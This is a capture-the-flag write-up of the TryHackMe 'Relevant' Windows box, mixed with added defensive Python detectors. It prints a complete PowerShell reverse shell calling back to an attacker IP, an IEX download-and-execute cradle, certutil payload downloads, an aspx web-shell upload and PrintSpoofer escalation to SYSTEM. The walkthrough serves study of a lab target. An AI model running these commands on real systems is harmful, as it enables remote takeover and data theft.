THM Machine Relevant
In this write-up I solve the TryHackMe machine Relevant. The privilege-escalation step uses the PrintSpoofer tool (abuse of an enabled SeImpersonatePrivilege) to gain a higher-privileged account.

Pre-Engagement Briefing
You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.
Scope of Work
The client requests that an engineer conduct an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
User.txt
Root.txt
Additionally, the client has provided the following scope allowances:
Any tools or techniques are permitted in this engagement; however, we ask that you attempt manual exploitation first
Locate and note all vulnerabilities found
Submit the flags discovered to the dashboard
Only the IP address assigned to your machine is in scope
Find and report ALL vulnerabilities.
Information Gathering
IP Address
export ip=10.10.111.67
Scanning
Running an nmap scan to find open ports gives the following result.
$ nmap -sC --min-rate 100 --max-rate 200 $ip
PORT STATE SERVICE
80/tcp open http
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2022-08-18T15:08:49+00:00
| ssl-cert: Subject: commonName=Relevant
| Issuer: commonName=Relevant
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-08-17T14:37:56
| Not valid after: 2023-02-16T14:37:56
| MD5: 8705 7420 7bf9 8563 bb66 29f5 cdde fd1d
|_SHA-1: 2c85 81dc 2811 d9b2 0d70 9cf7 593b 6b12 b260 53cc
|_ssl-date: 2022-08-18T15:08:48+00:00; -2m42s from scanner time.
49663/tcp open http
49667/tcp open unknown
Host script results:
|_clock-skew: mean: 1h21m18s, deviation: 3h07m50s, median: -2m42s
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-08-18T08:08:49-07:00
| smb2-time:
| date: 2022-08-18T15:08:48
|_ start_date: 2022-08-18T14:38:15
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
From the above scan result, we see the system has the following open ports and services running on it.
Port 80 is running an http service, most likely a Windows IIS web server.
Port 135 is running the Microsoft RPC (Remote Procedure Call) service, which is expected when the system runs smb and NetBIOS.
Port 139 is running the netbios service.
Port 445 is running the smb service; nmap reports it as microsoft-ds.
Port 3389 is the RDP (Remote Desktop Protocol) service, which reveals useful information such as the computer name and domain name.
Port 49663 is also running an http service.
Port 49667 is unknown to nmap, which could not guess what type of service runs on it.
Besides that, the scan results contain other information worth reading (the smb security-mode output, for example). Now let's move on to enumerating the services on the open ports.
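A scan like the one above is usually triaged by eye. As an added example (my own code, not part of the original write-up), here is a small Python parser over nmap's normal output that lists the open ports and flags the findings a reviewer would want to follow up: SMB signing disabled or not required, a guest SMB session being accepted, risky HTTP methods, and remote-access services exposed. The scan text is a shortened, constructed copy of the output above.

```python
"""Triage nmap normal-output text for findings worth following up.

Added example, not from the original write-up: parses the nmap text format
shown above, extracts open ports and flags the lines a defender should notice.
"""
import re

# Constructed sample: an abbreviated copy of the scan output above.
SAMPLE_SCAN = """\
PORT STATE SERVICE
80/tcp open http
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49663/tcp open http
49667/tcp open unknown
Host script results:
| smb-security-mode:
| account_used: guest
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")

# Services whose exposure on a host normally needs a justification.
REMOTE_ACCESS = {"ms-wbt-server": "RDP exposed", "microsoft-ds": "SMB exposed"}


def parse_ports(text):
    """Return (port, proto, state, service) tuples for every open port."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return ports


def triage(text):
    """Return a sorted list of finding strings derived from the scan text."""
    findings = set()
    for port, proto, _state, service in parse_ports(text):
        if service in REMOTE_ACCESS:
            findings.add(f"{port}/{proto}: {REMOTE_ACCESS[service]}")
    for line in text.splitlines():
        # Strip nmap's script-output prefix ("| " or "|_ ")
        body = line.lstrip("|_ ").strip()
        if body.startswith("Potentially risky methods:"):
            findings.add("HTTP: " + body)
        if body.startswith("message_signing: disabled"):
            findings.add("SMB1: message signing disabled")
        if body == "Message signing enabled but not required":
            findings.add("SMB2: message signing not required")
        if body == "account_used: guest":
            findings.add("SMB: guest session accepted")
    return sorted(findings)


if __name__ == "__main__":
    for finding in triage(SAMPLE_SCAN):
        print(finding)
```

The signing findings are the ones that matter most for this host: with signing not required, SMB traffic can be relayed, and the guest session is what makes the share enumeration in the next section possible without credentials.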
Enumeration
We saw there is an smb service running, so we can start with it and check whether it gives us any access with a guest or anonymous account (logging in without providing any credentials). We can use the Linux command-line utility smbclient to access it with the following command.
$ smbclient -L \\\\$ip\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
Above we list all the shares present on the smb server and see one that is not there by default: nt4wrksv. The nt4wrksv share also allows anonymous login, because I am able to connect to it using the following.
smbclient \\\\$ip\\nt4wrksv
In the share there is a passwords.txt file with the following content.
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
It looks like the passwords are base64-encoded, so I decode them with the following command.
$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d && echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
This gives the following output.
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
These look like credentials, so I tried them on RDP, but they don't work. I keep them in my notes for now and move on to enumerating other services.
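Base64 is encoding, not encryption, and files like this one turn up on shares more often than one would hope. As an added example (my own code, not from the original write-up), here is a Python check a defender can run over files pulled from an accessible share: it finds lines that are valid base64, decodes the ones that become printable ASCII, and reports those that look like "name - secret" pairs, printing only the user name rather than the secret. The input is the file content shown above plus a constructed non-base64 line.

```python
"""Flag base64-encoded lines that decode to credential-like text.

Added example, not from the original write-up: a secrets check for files
found on file shares, such as the passwords.txt above.
"""
import base64
import binascii
import re

# Constructed sample: the file content shown above plus one line that is not base64.
SAMPLE_FILE = """\
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
not-an-encoded-line
"""

# A base64 token: at least 8 alphabet characters, optional padding.
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
# "name - secret" shape, as in the decoded lines above.
CRED_SHAPE = re.compile(r"^\S+ - \S+$")


def try_decode(token):
    """Return the decoded text if token is valid base64 for printable ASCII, else None."""
    if not B64_TOKEN.match(token) or len(token) % 4 != 0:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_encoded_credentials(content):
    """Return (line_no, decoded_text) for lines that decode to credential-like text."""
    hits = []
    for no, line in enumerate(content.splitlines(), 1):
        decoded = try_decode(line.strip())
        if decoded and CRED_SHAPE.match(decoded):
            hits.append((no, decoded))
    return hits


if __name__ == "__main__":
    for no, decoded in find_encoded_credentials(SAMPLE_FILE):
        user = decoded.split(" - ", 1)[0]
        # Report the account, not the secret, so the report itself is safe to share.
        print(f"line {no}: base64-encoded credential for user {user!r}")
```

The `len(token) % 4` and `validate=True` checks keep ordinary words such as "Encoded" from being treated as base64; the printable-ASCII filter drops binary blobs that happen to decode.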
HTTP
There is more than one http server running on the machine, and they only serve the default Windows IIS page.
Content-Discovery
I use ffuf to discover hidden directories and files, but didn't find any useful directory where we could use the above credentials or do anything else.
I try the nt4wrksv share name on the web server and luckily it returns status 200. That means the directory exists, and when I request passwords.txt it shows me its content. I also try to upload files through smb, and I am able to do that.
Knowing this, we can upload a reverse shell file and execute it by visiting the page. As it is a Windows IIS server, which uses aspx or asp files as its backend language, we have to use a reverse shell written in that language. We can make one with msfvenom, but I use /usr/share/webshells/aspx/cmdasp.aspx and upload it with the following command.
smb: \> put /usr/share/webshells/aspx/cmdasp.aspx
After that I visit the page at http://$ip/nt4wrksv/cmdasp.aspx, and it shows me a command execution box where I can submit any command and see its output.
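The root cause here is that one directory is both writable over SMB and served by IIS with script execution enabled. As an added example (my own code, not from the original write-up), here is a Python detection that parses IIS W3C log lines and flags any request that executes an .asp/.aspx file under a directory that should only ever hold static content. The log lines are constructed samples modelled on the requests made above, and the list of writable directories is an assumption for the example.

```python
"""Detect script execution under a directory that should only serve static files.

Added example, not from the original write-up: parses IIS W3C extended log
lines and flags .asp/.aspx requests under share-backed directories.
"""
import re

# Assumption for the example: directories that are writable through a share
# and must therefore never execute server-side scripts.
WRITABLE_DIRS = ("/nt4wrksv/",)
SCRIPT_EXT = re.compile(r"\.(aspx?|ashx|asmx)$", re.IGNORECASE)

# Constructed sample IIS W3C log: header lines plus four requests.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2022-08-18 15:10:01 10.10.111.67 GET /nt4wrksv/passwords.txt - 80 - 10.11.79.134 Mozilla/5.0 200
2022-08-18 15:12:45 10.10.111.67 GET /nt4wrksv/cmdasp.aspx - 80 - 10.11.79.134 Mozilla/5.0 200
2022-08-18 15:12:50 10.10.111.67 POST /nt4wrksv/cmdasp.aspx - 80 - 10.11.79.134 Mozilla/5.0 200
2022-08-18 15:13:02 10.10.111.67 GET /iisstart.htm - 80 - 10.11.79.134 Mozilla/5.0 200
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            values = line.split()
            # Skip malformed records rather than mis-align columns.
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def flag_script_execution(text):
    """Return (time, client_ip, method, uri) for script requests in writable dirs."""
    hits = []
    for rec in parse_w3c(text):
        uri = rec["cs-uri-stem"].lower()
        if uri.startswith(WRITABLE_DIRS) and SCRIPT_EXT.search(uri):
            hits.append((rec["time"], rec["c-ip"], rec["cs-method"], rec["cs-uri-stem"]))
    return hits


if __name__ == "__main__":
    for time, client, method, uri in flag_script_execution(SAMPLE_LOG):
        print(f"{time} {client} {method} {uri}: script executed from a writable directory")
```

Detection is the fallback; the fix is to keep share-writable directories out of the web root, or to remove the script handler permission for that virtual directory in IIS so uploaded .aspx files are served as plain files or refused.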
Initial Access
Now I try to get a reverse shell by uploading a reverse shell binary (.exe) generated by msfvenom, but the antivirus deletes it. I also cannot execute the PowerShell reverse shell one-liner because the antivirus flags it as malicious. So I searched on Google and found the following approach: a command that downloads a text file containing PowerShell reverse shell code and executes it without alerting the antivirus. This is a staged payload: the first stage requests the second stage and executes it to give us a reverse shell.
The PowerShell code is the following.
function cleanup {
    if ($client.Connected -eq $true) { $client.Close() }
    if ($process.ExitCode -ne $null) { $process.Close() }
    exit
}
# Setup IPADDR: the attacker machine running the listener
$address = '10.11.79.134'
# Setup PORT: the listener port
$port = '4444'
# Connect back to the listener
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect($address, $port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
# Start cmd.exe with stdin/stdout redirected so it can be driven over the socket
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\windows\system32\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = New-Object System.Text.AsciiEncoding
# Send the initial cmd.exe banner and prompt to the listener
while ($outputstream.Peek() -ne -1) { $out += $encoding.GetString($outputstream.Read()) }
$stream.Write($encoding.GetBytes($out), 0, $out.Length)
$out = $null; $done = $false
# Main loop: read a line from the socket, feed it to cmd.exe, send the output back
while (-not $done) {
    if ($client.Connected -ne $true) { cleanup }
    $pos = 0; $i = 1
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
        $read = $stream.Read($networkbuffer, $pos, $networkbuffer.Length - $pos)
        $pos += $read
        # Stop reading once a newline (byte 10) has arrived
        if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) { break }
    }
    if ($pos -gt 0) {
        $string = $encoding.GetString($networkbuffer, 0, $pos)
        $inputstream.Write($string)
        Start-Sleep 1
        if ($process.ExitCode -ne $null) { cleanup }
        else {
            $out = $encoding.GetString($outputstream.Read())
            while ($outputstream.Peek() -ne -1) {
                $out += $encoding.GetString($outputstream.Read())
                # Drop the echoed command so only the output goes back
                if ($out -eq $string) { $out = '' }
            }
            $stream.Write($encoding.GetBytes($out), 0, $out.Length)
            $out = $null
            $string = $null
        }
    } else { cleanup }
}
There we have to change the $address variable to the attacker machine IP and the $port variable to the port we want to use, then save it as powershell.reverse.txt (or any filename you like) and host it; I use a Python http server for this.
$ python3 -m http.server 80
After hosting the PowerShell file, execute the following command in the command shell on the target.
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).downloadString('http://10.11.79.134/powershell.reverse.txt')"
This fetches your powershell.reverse.txt file, downloads it and executes it, and eventually you receive a connection back.
Note: start your netcat listener before executing the above command. For Windows targets I prefer the following command to start a listener (rlwrap gives the shell readline-style line editing).
$ rlwrap nc -lvnp 4444
Privilege Escalation
After gaining initial access to the system, the next thing we try to achieve is a higher-privileged account or access. To do that we enumerate the system for misconfigurations or plaintext passwords that we can use to get higher access.
We can use a tool named winPEAS that automates all the basic enumeration for us and highlights ways that can be used to get higher privileges.
I host winpeas.bat and transfer it using a Python http server; we could also upload it through smb.
certutil.exe -urlcache -split -f http://10.11.79.134/winPEAS.bat winpeas.bat
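Both transfer methods used in this write-up, the PowerShell IEX/DownloadString cradle from the Initial Access section and the certutil -urlcache -split -f download here, leave recognisable command lines in process-creation telemetry (Sysmon event 1, Security event 4688). As an added example (my own code, not from the original write-up), here is a Python scorer that weighs a command line by the indicators it contains so that the noisy combinations can be alerted on while ordinary certutil and PowerShell use stays quiet. The sample command lines are the two from this write-up plus two constructed benign ones; the indicator weights and threshold are assumptions to tune per environment.

```python
"""Score process command lines for download-cradle and LOLBin patterns.

Added example, not from the original write-up: a simple weighted-indicator
detector for process-creation logs.
"""
import re

# (pattern, weight, label): weights are an assumption, tune to your environment.
INDICATORS = [
    (re.compile(r"\biex\b|invoke-expression", re.I), 3, "powershell IEX"),
    (re.compile(r"downloadstring|downloadfile", re.I), 3, "WebClient download"),
    (re.compile(r"-nop\b|-noprofile", re.I), 1, "powershell -nop"),
    (re.compile(r"-w\s+hidden|-windowstyle\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-enc\b|-encodedcommand", re.I), 2, "encoded command"),
    (re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I), 3, "certutil download"),
    (re.compile(r"https?://", re.I), 1, "URL in command line"),
]

# Constructed sample command lines: the two from this write-up plus benign ones.
SAMPLE_CMDLINES = [
    "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient)"
    ".downloadString('http://10.11.79.134/powershell.reverse.txt')\"",
    "certutil.exe -urlcache -split -f http://10.11.79.134/winPEAS.bat winpeas.bat",
    "certutil.exe -hashfile C:\\setup.msi SHA256",
    "powershell -File C:\\scripts\\backup.ps1",
]


def score_command_line(cmd):
    """Return (score, labels) for one command line."""
    score, labels = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(cmd):
            score += weight
            labels.append(label)
    return score, labels


def alerts(cmdlines, threshold=4):
    """Return (score, cmd, labels) for command lines whose score reaches threshold."""
    out = []
    for cmd in cmdlines:
        score, labels = score_command_line(cmd)
        if score >= threshold:
            out.append((score, cmd, labels))
    return out


if __name__ == "__main__":
    for score, cmd, labels in alerts(SAMPLE_CMDLINES):
        print(f"[{score}] {', '.join(labels)}: {cmd}")
```

The threshold is what keeps the benign certutil -hashfile and the scheduled script below the line; a single URL or a lone -nop is not worth an alert, but IEX plus DownloadString plus a hidden window, or certutil with -urlcache and a URL, is.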
After running winpeas.bat we see our user holds a permission that is used in privilege escalation.
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
There we can see SeImpersonatePrivilege is enabled. In Windows there is a vulnerability or misconfiguration around this privilege that is used for privilege escalation: if a user has it enabled, we can use a tool named PrintSpoofer, which can be downloaded from the following link.
https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
Download the binary, host it with a Python server or some other way, and then fetch it on the target system with the following command.
certutil.exe -urlcache -split -f http://10.11.79.134/PrintSpoofer64.exe PrintSpoofer64.exe
After that, use the following command to exploit the vulnerability and get a higher-privileged account.
PrintSpoofer64.exe -i -c cmd.exe
This opens a command prompt as the nt authority\system account, which has full permissions on the system. Secure both the user.txt and root.txt flags and submit them.
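The lesson for the defender is that SeImpersonatePrivilege (like SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeDebugPrivilege and a few others) makes an account effectively SYSTEM-equivalent, so a service or web application account holding it should be treated accordingly, and PrintSpoofer specifically depends on the Print Spooler service being reachable. As an added example (my own code, not from the original write-up), here is a Python audit that parses the whoami /priv style table shown above, reports which high-impact privileges the account holds (enabled or not, since a disabled privilege can be re-enabled by the process itself), and notes the spooler mitigation. The privilege table is the one above; the spooler state is an assumed input.

```python
"""Audit a whoami /priv listing for privileges that make an account SYSTEM-equivalent.

Added example, not from the original write-up: parses the PRIVILEGES
INFORMATION table shown above and reports what a defender should act on.
"""
import re

# Privileges Microsoft documents as effectively administrator-equivalent:
# holding any of them lets a process obtain another user's token or rewrite
# the system, so "Disabled" here is not a mitigation.
HIGH_IMPACT = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeTcbPrivilege",
    "SeDebugPrivilege",
    "SeLoadDriverPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
    "SeCreateTokenPrivilege",
}

# Constructed sample: the table from the write-up above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

ROW_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def audit(text, spooler_running=True):
    """Return finding strings: high-impact privileges held, plus the spooler caveat."""
    privs = parse_privileges(text)
    held = sorted(p for p in privs if p in HIGH_IMPACT)
    findings = []
    for p in held:
        # "Disabled" only means not currently active; the process may enable it.
        findings.append(f"{p} held ({privs[p].lower()}): treat the account as SYSTEM-equivalent")
    if "SeImpersonatePrivilege" in held and spooler_running:
        findings.append("Print Spooler running: named-pipe impersonation via the spooler "
                        "(PrintSpoofer) is available; stop and disable the service if not needed")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_WHOAMI_PRIV, spooler_running=True):
        print(finding)
```

Stopping the spooler closes only the PrintSpoofer route; as long as the account keeps SeImpersonatePrivilege, other coercion paths remain, so the durable fix is to run the web application under an account that does not hold it.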